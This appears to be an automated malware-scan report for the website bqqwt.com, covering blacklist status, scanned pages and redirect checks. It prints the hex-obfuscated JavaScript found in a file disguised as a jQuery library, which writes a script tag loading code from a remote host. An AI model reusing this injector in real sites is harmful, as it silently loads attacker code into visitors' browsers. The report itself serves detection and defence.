Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bqqwt.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bqqwt.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bqqwt.com/ | 200 OK Content-Length: 10799 Content-Type: text/html | clean |
http://bqqwt.com/jquery-1.1.0.min.js | 200 OK Content-Length: 682 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x39\x39\x33\x34\x35\x2e\x63\x6f\x6d\x2f\x4a\x69\x6e\x44\x2e\x70\x68\x70\"\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");
document.writeln('<script language=\"javascript\" src=\"http://count41.51yes.com/click.aspx?id=419570711&logo=3\" charset=\"gb2312\"></script>'); document.writeln('<script language=\"javascript\" src=\"http://count41.51yes.com/click.aspx?id=414590753&logo=12\" charset=\"gb2312\"></script>'); Antivirus reports:
| ||
http://bqqwt.com/catalog.asp?page=2 | 200 OK Content-Length: 10895 Content-Type: text/html | clean |
http://bqqwt.com/test404page.js | 404 Not Found Content-Length: 83 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=3 | 200 OK Content-Length: 10921 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=4 | 200 OK Content-Length: 9738 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=5 | 200 OK Content-Length: 10442 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=6 | 200 OK Content-Length: 10873 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=7 | 200 OK Content-Length: 9704 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=8 | 200 OK Content-Length: 9882 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=9 | 200 OK Content-Length: 9891 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=10 | 200 OK Content-Length: 10886 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=11 | 200 OK Content-Length: 10372 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=12 | 200 OK Content-Length: 9168 Content-Type: text/html | clean |
http://bqqwt.com/catalog.asp?page=13 | 200 OK Content-Length: 9713 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bqqwt.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 16 Apr 2014 01:22:50 GMT
Server: Microsoft-IIS/6.0
Content-Length: 10799
Content-Type: text/html; Charset=UTF-8
Last-Modified: Tue, 15 Apr 2014 02:18:39 GMT
Product: Z-Blog 2.2 Prism Build 130801
Set-Cookie: ASPSESSIONIDASDATDAA=AEHJGONCDOIFOICMAJAAEOAC; path=/
X-Powered-By: ASP.NET
...10799 bytes of data.
GET / HTTP/1.1
Host: bqqwt.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 16 Apr 2014 01:22:50 GMT
Server: Microsoft-IIS/6.0
Content-Length: 10799
Content-Type: text/html; Charset=UTF-8
Last-Modified: Tue, 15 Apr 2014 02:18:39 GMT
Product: Z-Blog 2.2 Prism Build 130801
Set-Cookie: ASPSESSIONIDASDATDAA=AEHJGONCDOIFOICMAJAAEOAC; path=/
X-Powered-By: ASP.NET
...10799 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: bqqwt.com
Referer: http://www.google.com/search?q=bqqwt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bqqwt.com
Referer: http://www.google.com/search?q=bqqwt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.